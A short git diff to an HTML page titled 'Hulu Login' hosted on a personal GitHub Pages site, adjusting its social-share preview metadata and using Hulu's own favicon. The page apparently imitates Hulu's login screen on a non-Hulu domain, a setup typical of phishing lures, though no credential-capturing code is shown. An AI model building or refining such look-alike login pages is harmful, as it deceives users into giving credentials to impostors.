--- a/Hulu.html
+++ b/Hulu.html
@@ -6,14 +6,9 @@
     <title>Hulu Login | Hulu</title>
     <meta property="og:title" content="Hulu Login Page">
     <meta property="og:description" content="Login to Hulu to watch your favorite shows!">
-    <meta property="og:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu_Thumbnqail.png">
+    <meta property="og:image" content="https://github.com/Louise2003-gg/Hulu-Login-Hulu/blob/main/Hulu_Thumbnqail.png">
     <meta property="og:url" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/Hulu.html">
     <meta property="og:type" content="website">
-
-    <meta name="twitter:card" content="summary_large_image">
-    <meta name="twitter:title" content="Hulu Login Page">
-    <meta name="twitter:description" content="Login to Hulu to watch your favorite shows!">
-    <meta name="twitter:image" content="https://louise2003-gg.github.io/Hulu-Login-Hulu/thumbnqail.png">
 
     <script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
     <link rel="shortcut icon" href="//assetshuluimcom-a.akamaihd.net/h3o/icons/favicon.ico.png" type="image/vnd.microsoft.icon" class="jsx-533771383">
